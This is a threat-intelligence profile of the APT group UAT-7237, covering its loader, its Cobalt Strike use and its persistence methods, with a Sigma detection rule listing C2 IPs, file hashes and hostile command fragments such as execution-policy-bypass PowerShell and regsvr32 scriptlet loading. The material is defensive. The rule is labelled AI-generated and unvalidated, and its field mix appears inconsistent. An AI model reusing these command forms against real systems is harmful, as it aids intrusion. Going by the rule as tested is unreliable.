Threat Actor 🇨🇳 China

UAT-7237

IoCs CSV 1 detection rule

UAT-7237 is a Chinese-speaking APT group that has been active since at least 2022, primarily targeting web infrastructure entities in Taiwan. They utilize a customized Shellcode loader known as “SoundBill” to execute shellcode, including Cobalt Strike payloads, and rely on SoftEther VPN clients and RDP for persistence and access. UAT-7237 employs techniques such as credential extraction using Mimikatz, reconnaissance with WMI-based tools, and selective deployment of web shells. Their operations indicate a focus on long-term persistence and stealth, with a preference for open-sourced and customized tooling.

Indicators of Compromise 13

MITRE ATT&CK TTPs 10

Detection Rules

UAT_7237_SIGMA_Detection
sigma ai_generated
title: Detection of UAT-7237 (CL-STA-1062) Activity via AppDomainManager Injection and C2 Communication
id: 3a8d5e2b-9c1e-4f0a-9b2d-7a8c4f1c3e4a
status: experimental
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\AppDomainManager.dll'
    selection_exe:
        OriginalFileName: 'PerfWatson2.exe'
    selection_cmd:
        CommandLine|contains:
            - 'powershell -exec bypass -w 1'
            - 'regsvr32 /s /n /u /i:'
    selection_net:
        DestinationIp:
            - '139.180.134.221'
            - '202.182.102.5'
            - '45.76.210.43'
            - '45.32.113.172'
    selection_file:
        TargetFilename|endswith: '\chrome_setup.zip'
    selection_hashes:
        HashSha256:
            - '00e09754526d0fe836ba27e3144ae161b0ecd3774abec5560504a16a67f0087c'
            - 'f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1'
            - 'dce5df29bddff5a4ddaea5c4fec14da91f7b69063a6e1c45ed61e5da4fc6c87b'
            - 'cbfe8de6ffadbb1d396f61e63eb18e8b11c29527c1528641e3223d4c516cf7c3'
            - '4e1f8888d020decd09799ec946f1bf677cac6612b24582ddbf4d8ede425d8384'
            - '9b481b69cd91b09fa7bae7428f646dd89473a4c03393e43da81fe756cde1c472'
    condition: 1 of selection_*
falsepositives:
    - Legitimate software updates using similar filenames (rare)
    - Administrative scripting with obfuscated commands (uncommon in standard user context)
level: critical

Rules are AI-generated and unvalidated. Test in a safe environment before production use.

Source Articles